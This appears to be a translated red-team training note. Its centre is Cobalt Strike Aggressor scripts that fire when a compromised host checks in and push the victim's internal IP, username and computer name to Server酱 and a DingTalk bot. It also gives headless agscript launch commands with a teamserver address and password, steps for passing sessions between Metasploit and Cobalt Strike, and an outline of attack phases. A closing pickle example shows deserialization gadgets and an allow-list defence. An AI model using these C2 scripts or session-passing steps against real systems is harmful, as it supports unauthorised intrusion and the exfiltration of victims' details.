    $url = 'https://sc.ftqq.com/<your Server酱 SCKEY>.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0Aip:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName;
    http_get($url);
}
3. Load the plugin
4. Test check-in
At the end of July the default Server酱 service endpoint will be discontinued; for delivery to WeChat you can use WeCom (企业微信).
Once the cna script is added on the local client, the notification request is sent from the client whenever a beacon checks in. The problem is that to receive notifications you would then have to keep the client running and connected to the teamserver the whole time, which is very inconvenient, and if the network fluctuates and the connection to the teamserver drops, no notification arrives. Cobalt Strike has two ways of loading plugins: on the client and on the server. A plugin loaded on the client is not loaded while the client is disconnected from the server, so sometimes certain plugins have to be loaded on the server side. On the server there is an agscript file, which runs cna files on the server side, so you no longer need to stay connected to the server.
./agscript [host] [port] [user] [pass] </path/to/file.cna>
[host] # IP address of the CS server
[port] # CS port
[user] # username used to run this script; anything will do
[pass] # the CS password, i.e. the one you set when starting CS
[path] # path to the cna file
But we usually run it in the background:
nohup ./agscript 192.168.107.129 50050 book4yi sws888 /root/桌面/cs3.14-extends/server_wechat_info/http_ftqq.cna &
8. Linking CS with DingTalk
DingTalk bot setup
Create a custom bot in your group
Save the token
Plugin source
# author: TeamsSix
# DingTalk bot configuration
$DingDing_Robot_Token = 'your_token'; ### the DingTalk bot token
$DingDing_Robot_Url = 'https://oapi.dingtalk.com/robot/send?access_token='.$DingDing_Robot_Token;
$Notice_Title = 'CS 有主机上线了!';
# Test
on ready {
    @curl_command = @('curl','-H','Content-Type: application/json','-d','{"msgtype": "text","text": {"content": "CS 钉钉机器人添加成功"}}',$DingDing_Robot_Url);
    exec(@curl_command);
}
# Check-in notification:
on beacon_initial {
    println("Initial Beacon Checkin: " . $1 . " PID: " . beacon_info($1, "pid"));
    local('$InternalIP $ComputerName $UserName');
    $InternalIP = replace(beacon_info($1, "internal"), " ", "_");
    $ComputerName = replace(beacon_info($1, "computer"), " ", "_");
    $UserName = replace(beacon_info($1, "user"), " ", "_");
    $Info = '# '.$Notice_Title.'\n\n计算机名称:'.$ComputerName.'\n\n用户名:'.$UserName.'\n\nIP 地址:'.$InternalIP;
    @curl_command = @('curl','-H','Content-Type: application/json','-d','{"msgtype": "markdown","markdown": {"title":"'.$Notice_Title.'","text": "'.$Info.'"}}',$DingDing_Robot_Url);
    exec(@curl_command);
}
Load the plugin in the background on the CS server side:
nohup ./agscript 192.168.107.129 50050 book4yi sws888 <path to the plugin> &
0x03. Converting between MSF and CS (homework)
1. MSF to CS
1.1 Create an HTTP listener in CS
1.2 Get a shell in MSF
1.3 Use payload_inject
When configuring it, remember to choose the http payload, and CS's IP and port.
2. CS to MSF
2.1 Get a shell in CS
2.2 Create a foreign_http listener (optional)
2.3 Start a listener in MSF
2.4 Right-click, spawn
0x04. Initial access
1. Common ways of gaining initial access
1.1 Shells: web RCE, file upload, sensitive information
1.2 Phishing (to be covered in a make-up class)
0x05. Process
1. Red team
1. Sign the contract. Points to note: test scope (IPs, domains, including physical scope) and time window
2. Plan the timeline of the whole operation and assign roles and responsibilities
3. Select, write or prepare the tools needed for the assigned roles and tasks
4. Information gathering: active, but do passive first; Maltego
Information gathering:
There is usually an initial target.
Starting from the initial target, do passive information gathering.
Begin active information gathering.
Organise the information.
Analyse the information -> business and functionality.
5. For each piece of information gathered, manually inspect the specific business and function behind it
6. Run vulnerability scanning against that function and business
7. Exploitation
8. Persistence
9. Privilege escalation
10. Lateral movement
11. Cleaning up traces
12. Writing the report
2. Cybercrime groups
1. Take the job
2. Targets and tools are fairly fixed; no preparation needed
3. Information gathering is optional
4. Vulnerability scanning
5. Exploitation
3. APT groups
1. Taking a job is optional
2. Tool development (usually not MSF or CS)
3. Information gathering (what they excel at, and the longest phase)
0x06. Supplement
FQ (getting past the Great Firewall):
Overseas server (BandwagonHost) -> V2Ray (usually this one) -> SSR
Serialization
When input data is stored into computer memory, a conversion happens in between: from the "1" a human can read to the "1" the computer's memory can read. That conversion process is serialization.
Deserialization
Taking data out of computer memory and turning it back into data a human can understand is deserialization.
Deserialization vulnerabilities
Gadget chains, chained together.
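The line above compresses a lot: a deserializer that resolves class or function names from untrusted bytes will instantiate, and via hooks like __reduce__ call, whatever those bytes name, and a gadget chain is just a sequence of such objects that ends in something useful to the attacker. The following is an added example, not from these notes: it shows the mechanism with Python's pickle using a harmless callable (os.getpid) as the stand-in gadget, and a restricted Unpickler that only resolves an allow-list of classes.

```python
"""Untrusted deserialization and one mitigation, shown with Python's pickle.

Added example, not from the notes. Gadget is a constructed demo class; its
__reduce__ names os.getpid as a harmless stand-in for what a real gadget chain
would point at.
"""
import io
import os
import pickle


class Greeting:
    """Ordinary data class we do want to accept from the wire."""
    def __init__(self, text: str):
        self.text = text

    def __eq__(self, other):
        return isinstance(other, Greeting) and other.text == self.text


class Gadget:
    """Constructed demo gadget: on load, pickle calls whatever __reduce__ names."""
    def __reduce__(self):
        return (os.getpid, ())   # loader will call os.getpid() with no args


# Only this (module, name) pair may be resolved while unpickling.
ALLOWED = {(__name__, "Greeting")}


class RestrictedUnpickler(pickle.Unpickler):
    """Resolve allow-listed globals only; every other reference is refused."""
    def find_class(self, module, name):
        if (module, name) in ALLOWED:
            return Greeting
        raise pickle.UnpicklingError(f"refused global {module}.{name}")


def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()


def unsafe_loads(data: bytes):
    return pickle.loads(data)   # plain pickle.loads resolves any global


def demo():
    """Return (benign round-trips, gadget ran unrestricted, gadget refused)."""
    benign = pickle.dumps(Greeting("hi"))
    hostile = pickle.dumps(Gadget())
    round_trip = safe_loads(benign) == Greeting("hi")
    ran = unsafe_loads(hostile) == os.getpid()   # the loader executed os.getpid()
    try:
        safe_loads(hostile)
        refused = False
    except pickle.UnpicklingError:
        refused = True
    return round_trip, ran, refused
```

A data-only format such as json.loads never resolves names at all, which is why it is the usual recommendation for untrusted input.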